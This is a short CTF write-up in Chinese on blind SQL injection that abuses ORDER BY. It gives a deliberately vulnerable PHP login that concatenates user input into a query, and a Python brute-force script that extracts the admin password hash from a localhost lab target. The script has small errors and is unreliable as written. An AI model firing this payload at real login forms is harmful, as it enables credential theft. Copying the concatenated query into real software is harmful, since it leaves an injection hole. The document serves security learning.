SQLi - order by 特性 blind
in PENETRATIONCTF with 0 comment

SQLi - order by 特性 blind

in PENETRATIONCTF with 0 comment

利用场景

登录代码:

$username = $_POST['username']; 
$password = $_POST['password']; 
if(filter($username)){ 
//过滤括号 
}else{ 
$sql="SELECT * FROM admin WHERE username='".$username."'"; 
$result=mysql_query($sql);
 @$row = mysql_fetch_array($result); 
if(isset($row) && $row['username'] === 'admin'){ 
if ($row['password']===md5($password)){ 
//Login successful }else{ die("password error!"); 
} 
}else{ 
die("username does not exist!"); 
} 
}

a07ccf2af8bd8adaeb752dde817d0390803296ddfebb858944af89ab3bfecdd7.png
自己写的利用脚本:

#!/usr/bin/evn python
#_*_ coding:utf-8 _*_

import requests
url = "链接:http://127.0.0.1/orderby-blind.php"
exploit = "' or 1 union select 1,2,'{0}{1}' order by 3 #"
payloads = "0123456789abcdefghijklmnopqrstuvwxyz"
passwd = ""
for i in range(1,32):
    for p in payloads:
        #print p
        exp = exploit.format(passwd,p)
        data = {"uname": exp, "passwd": "drop"}
        res = requests.post(url, data=data)
        #print exp
        if "password error!" in res.text:
            passwd += chr(ord(p) - 1)
            print passwd
        else:
            continue

fc4a92382e8b482b330366fd36b79134a27a8267c7ac995e8da20a095a9ee7cf_min.jpg

Responses